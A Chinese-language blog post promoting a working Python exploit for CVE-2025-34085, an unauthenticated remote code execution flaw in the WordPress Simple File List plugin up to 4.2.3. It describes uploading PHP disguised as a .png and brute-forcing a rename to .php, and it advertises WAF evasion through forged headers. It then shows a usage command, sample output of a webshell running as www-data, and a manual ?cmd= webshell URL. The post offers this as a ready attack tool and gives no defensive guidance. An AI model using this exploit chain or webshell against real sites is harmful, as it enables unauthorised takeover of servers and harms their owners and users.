WordPress Simple File List插件未授权RCE漏洞利用详解(CVE-2025-34085)

本文详细介绍了WordPress Simple File List插件(<=4.2.3版本)存在的未授权远程代码执行漏洞,包含完整的Python利用代码、漏洞原理分析和实际利用方法。

📂 Simple File List – 未授权RCE漏洞利用 (CVE-2025-34085)

⚠️ 漏洞利用代码作者: Mrj Haxcore

这是一个完全可用的Python漏洞利用程序,针对WordPress Simple File List插件(<= 4.2.3版本),该插件由于不安全的文件上传和重命名逻辑而存在**未授权远程代码执行(RCE)**漏洞。


💣 漏洞概述

  • 插件: Simple File List (simple-file-list)
  • 版本: <= 4.2.3
  • CVE: CVE-2025-34085
  • 影响: 未授权用户可以上传伪装为.png的PHP文件,然后将其重命名为.php并执行任意代码
  • 要求: 无需身份验证
  • 利用类型: 文件上传 → 重命名绕过 → 命令执行

✅ 功能特性

  • 🚀 完全自动化的利用链
  • 📤 手动构建multipart/form-data(绕过415错误)
  • 🔁 对.php.php5.phtml等的重命名暴力破解
  • 🛡️ 逼真的伪造头部以绕过WAF
  • 🐚 通过?cmd=参数执行命令
  • 🧼 干净的输出(无�PNG垃圾数据)

🛠 使用方法

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
python3 simple.py https://target.site

[+] 正在上传shell为8dkls0qp.png...
[+] 上传成功
[+] 尝试重命名为: 8dkls0qp.php...
[+] 重命名成功: 8dkls0qp.php
[+] 触发shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell输出:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

手动访问

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计